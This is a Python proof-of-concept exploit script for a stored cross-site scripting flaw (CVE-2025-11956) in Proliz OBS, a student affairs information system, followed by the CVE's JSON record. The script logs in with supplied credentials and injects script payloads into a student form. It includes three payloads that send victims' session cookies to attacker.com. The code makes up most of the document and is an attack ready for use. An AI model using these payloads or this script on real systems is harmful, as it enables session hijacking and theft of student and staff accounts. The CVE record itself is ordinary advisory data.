CVE-2025-11956

import requests import argparse # CVE-2025-11956 Stored XSS PoC # Target: Proliz OBS (Student Affairs Information System) # Vulnerability: Improper Input Neutralization leading to Stored XSS def exploit_stored_xss(target_url, username, password, payload): """ Exploit stored XSS vulnerability in OBS system """ session = requests.Session() # Step 1: Login to the system login_url = f"{target_url}/login" login_data = { 'username': username, 'password': password } try: response = session.post(login_url, data=login_data) print(f"[*] Login attempt: {response.status_code}") # Step 2: Inject XSS payload in student info form inject_url = f"{target_url}/student/add" inject_data = { 'student_name': f"<script>alert(document.cookie)</script>", 'student_id': '12345', 'notes': payload } response = session.post(inject_url, data=inject_data) print(f"[*] Payload injection: {response.status_code}") # Step 3: Verify stored XSS view_url = f"{target_url}/student/view/12345" response = session.get(view_url) if payload in response.text or '<script>' in response.text: print("[+] Stored XSS vulnerability confirmed!") return True else: print("[-] Payload not found in response") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False # Example payloads for CVE-2025-11956 PAYLOADS = [ '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>', '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">', '<svg/onload=fetch("https://attacker.com/cookie?"+document.cookie)>' ] if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-11956 PoC') parser.add_argument('-t', '--target', required=True, help='Target URL') parser.add_argument('-u', '--username', required=True, help='Username') parser.add_argument('-p', '--password', required=True, help='Password') args = parser.parse_args() for payload in PAYLOADS: print(f"[*] Testing payload: {payload}") exploit_stored_xss(args.target, args.username, args.password, payload)

{"cve": {"id": "CVE-2025-11956", "sourceIdentifier": "[email protected]", "published": "2025-11-06T15:15:46.093", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Proliz Software Ltd. Co. OBS (Student Affairs Information System) allows Stored XSS.This issue affects OBS (Student Affairs Information System): before 25.0401."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0379", "source": "[email protected]"}]}}